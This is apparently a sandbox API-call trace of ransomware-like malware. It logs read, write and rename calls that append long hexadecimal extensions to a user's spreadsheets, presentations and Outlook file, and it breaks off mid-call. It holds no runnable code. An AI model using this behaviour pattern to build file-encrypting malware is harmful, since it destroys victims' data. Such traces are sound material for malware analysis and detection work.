0x0 [0124.418] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx", lpString2=".350704F9FEC06F52AAF7FBCDC9B97A4E628DB7CC54817389EA2FAE36B067675F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx.350704F9FEC06F52AAF7FBCDC9B97A4E628DB7CC54817389EA2FAE36B067675F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\MTUhB4BoPv_s.xlsx.350704F9FEC06F52AAF7FBCDC9B97A4E628DB7CC54817389EA2FAE36B067675F" [0124.418] GetProcessHeap () returned 0x600000 [0124.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3118ae0 [0124.418] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3118ae0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0124.419] CloseHandle (hObject=0x32c) returned 1 [0124.420] GetProcessHeap () returned 0x600000 [0124.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.420] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.425] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.425] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.426] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.426] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx", lpString2=".9F4569AAE322F4BE0A680F57640A219F585D78B7AD14F135E9060AC23CAE883D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx.9F4569AAE322F4BE0A680F57640A219F585D78B7AD14F135E9060AC23CAE883D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OEhLsf8VY9PmW25.xlsx.9F4569AAE322F4BE0A680F57640A219F585D78B7AD14F135E9060AC23CAE883D" [0124.426] GetProcessHeap () returned 0x600000 [0124.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x31548b8 [0124.426] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x31548b8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0124.427] CloseHandle (hObject=0x32c) returned 1 [0124.428] GetProcessHeap () returned 0x600000 [0124.428] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.429] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.433] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.434] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.435] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.435] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx", lpString2=".BC2F008822DBC8806244FD88F2DB2AEF0707DF83F5C0B9699D3E756E32F9E422" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx.BC2F008822DBC8806244FD88F2DB2AEF0707DF83F5C0B9699D3E756E32F9E422") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\OQzXHSs_CGbaL.docx.BC2F008822DBC8806244FD88F2DB2AEF0707DF83F5C0B9699D3E756E32F9E422" [0124.435] GetProcessHeap () returned 0x600000 [0124.435] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x3154b28 [0124.435] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3154b28, Length=0x122, FileInformationClass=0xa) returned 0x0 [0124.436] CloseHandle (hObject=0x32c) returned 1 [0124.437] GetProcessHeap () returned 0x600000 [0124.437] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.437] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.442] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.442] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.442] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.443] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.444] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.444] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst", lpString2=".AEDFFFC61EE2FD076DA070FBF8C03AB3B4A0C6C2AD916F7A7A5B7AC3599BA328" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst.AEDFFFC61EE2FD076DA070FBF8C03AB3B4A0C6C2AD916F7A7A5B7AC3599BA328") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst.AEDFFFC61EE2FD076DA070FBF8C03AB3B4A0C6C2AD916F7A7A5B7AC3599BA328" [0124.444] GetProcessHeap () returned 0x600000 [0124.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13e) returned 0x3119f88 [0124.444] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3119f88, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0124.459] CloseHandle (hObject=0x328) returned 1 [0124.460] GetProcessHeap () returned 0x600000 [0124.460] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.461] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.472] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x7a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.472] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.473] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.473] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx", lpString2=".14A249A255A0F027B03985F9A6EEF73C32410636D3574A951AB3056ED55B8B22" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx.14A249A255A0F027B03985F9A6EEF73C32410636D3574A951AB3056ED55B8B22") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx.14A249A255A0F027B03985F9A6EEF73C32410636D3574A951AB3056ED55B8B22" [0124.473] GetProcessHeap () returned 0x600000 [0124.473] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x3119548 [0124.474] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3119548, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0124.475] CloseHandle (hObject=0x328) returned 1 [0124.475] GetProcessHeap () returned 0x600000 [0124.475] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.475] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.478] ReadFile (in: hFile=0x32c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.479] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.480] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.480] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt", lpString2=".FE1E9A1FAEC4A6AFC4A1859204FFB884ED82640AFDC0CA9AE85A8E63218EBD57" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt.FE1E9A1FAEC4A6AFC4A1859204FFB884ED82640AFDC0CA9AE85A8E63218EBD57") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt.FE1E9A1FAEC4A6AFC4A1859204FFB884ED82640AFDC0CA9AE85A8E63218EBD57" [0124.480] GetProcessHeap () returned 0x600000 [0124.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x128) returned 0x3153190 [0124.480] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3153190, Length=0x128, FileInformationClass=0xa) returned 0x0 [0124.483] CloseHandle (hObject=0x32c) returned 1 [0124.484] GetProcessHeap () returned 0x600000 [0124.484] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.484] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.489] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.489] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.490] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.490] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx", lpString2=".31EE88644C946BE35D9D34A5C20E88EF609F918CC311D55207F17183CE5A6C7B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx.31EE88644C946BE35D9D34A5C20E88EF609F918CC311D55207F17183CE5A6C7B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx.31EE88644C946BE35D9D34A5C20E88EF609F918CC311D55207F17183CE5A6C7B" [0124.490] GetProcessHeap () returned 0x600000 [0124.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x118) returned 0x31191d0 [0124.490] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x31191d0, Length=0x118, FileInformationClass=0xa) returned 0x0 [0124.491] CloseHandle (hObject=0x328) returned 1 [0124.491] GetProcessHeap () returned 0x600000 [0124.492] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.492] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.494] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.495] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.496] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.496] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx", lpString2=".BC00D0590C3AFF8B7B6AF5BF847B05B7CA312A9004B6D79438B6FEB6782ADD63" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx.BC00D0590C3AFF8B7B6AF5BF847B05B7CA312A9004B6D79438B6FEB6782ADD63") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx.BC00D0590C3AFF8B7B6AF5BF847B05B7CA312A9004B6D79438B6FEB6782ADD63" [0124.496] GetProcessHeap () returned 0x600000 [0124.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3154168 [0124.496] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3154168, Length=0x124, FileInformationClass=0xa) returned 0x0 [0124.498] CloseHandle (hObject=0x328) returned 1 [0124.499] GetProcessHeap () returned 0x600000 [0124.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.499] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.503] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x7c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.503] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.504] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.504] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx", lpString2=".A7E9A47AE0A3232B152BA60454C43E97E8D3EB851D4369035065074850D1950D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx.A7E9A47AE0A3232B152BA60454C43E97E8D3EB851D4369035065074850D1950D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx.A7E9A47AE0A3232B152BA60454C43E97E8D3EB851D4369035065074850D1950D" [0124.504] GetProcessHeap () returned 0x600000 [0124.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x3153dc0 [0124.504] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3153dc0, Length=0x126, FileInformationClass=0xa) returned 0x0 [0124.505] CloseHandle (hObject=0x328) returned 1 [0124.506] GetProcessHeap () returned 0x600000 [0124.506] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.506] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.509] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.509] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.510] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.510] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx", lpString2=".DF191FDCE4C2E862B3341D2C03F0917AF46C841C9F8BDFE1F671B321A37AF160" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx.DF191FDCE4C2E862B3341D2C03F0917AF46C841C9F8BDFE1F671B321A37AF160") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx.DF191FDCE4C2E862B3341D2C03F0917AF46C841C9F8BDFE1F671B321A37AF160" [0124.510] GetProcessHeap () returned 0x600000 [0124.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3118c08 [0124.510] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3118c08, Length=0x120, FileInformationClass=0xa) returned 0x0 [0124.514] CloseHandle (hObject=0x328) returned 1 [0124.515] GetProcessHeap () returned 0x600000 [0124.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.516] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.521] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.521] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.522] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.523] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls", lpString2=".B1BC1ED239DB79D6D05AB5DC3C447F5EF5B4AB0E8257082521F828A18C30CB46" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls.B1BC1ED239DB79D6D05AB5DC3C447F5EF5B4AB0E8257082521F828A18C30CB46") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls.B1BC1ED239DB79D6D05AB5DC3C447F5EF5B4AB0E8257082521F828A18C30CB46" [0124.523] GetProcessHeap () returned 0x600000 [0124.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3153400 [0124.523] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3153400, Length=0x124, FileInformationClass=0xa) returned 0x0 [0124.524] CloseHandle (hObject=0x328) returned 1 [0124.524] GetProcessHeap () returned 0x600000 [0124.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.524] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.528] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.528] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.529] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.529] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx", lpString2=".A81C98EF13A98BE3BE84C4D704DBB1A2D442B5948C958DB80FB7E3871473FF77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx.A81C98EF13A98BE3BE84C4D704DBB1A2D442B5948C958DB80FB7E3871473FF77") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx.A81C98EF13A98BE3BE84C4D704DBB1A2D442B5948C958DB80FB7E3871473FF77" [0124.529] GetProcessHeap () returned 0x600000 [0124.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x3118640 [0124.529] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x3118640, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0124.530] CloseHandle (hObject=0x328) returned 1 [0124.531] GetProcessHeap () returned 0x600000 [0124.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.531] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.575] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.575] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.581] WriteFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.593] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.993] ReadFile (in: hFile=0x31c, lpBuffer=0x30c0180, 